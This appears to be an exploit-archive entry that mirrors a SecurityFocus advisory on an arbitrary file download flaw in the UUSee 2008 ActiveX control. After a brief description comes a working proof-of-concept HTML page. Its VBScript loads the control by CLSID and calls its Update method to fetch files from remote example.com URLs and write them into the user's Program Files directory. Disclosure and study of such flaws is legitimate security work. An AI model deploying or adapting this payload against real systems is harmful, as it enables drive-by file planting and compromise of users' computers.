9 lines
No EOL
748 B
HTML
9 lines
No EOL
748 B
HTML
source: http://www.securityfocus.com/bid/29963/info
|
|
|
|
UUSee is prone to a vulnerability that can cause malicious files to be downloaded and saved to arbitrary locations on an affected computer.
|
|
|
|
Attackers may exploit this issue to overwrite sensitive files with malicious data that will compromise the affected computer. Other attacks are possible.
|
|
|
|
UUSee 2008 is vulnerable; other versions may also be affected.
|
|
|
|
<html> <object classid='clsid:2CACD7BB-1C59-4BBB-8E81-6E83F82C813B' id='target'></object> <script language='vbscript'> arg1="\Program Files\Common Files\uusee\" arg2="http://www.example.com/UU.ini" arg3="http://www.example2.com/mini3/uusee_client_update/remark.php" arg4=1 target.Update arg1 ,arg2 ,arg3 ,arg4 </script> </html> |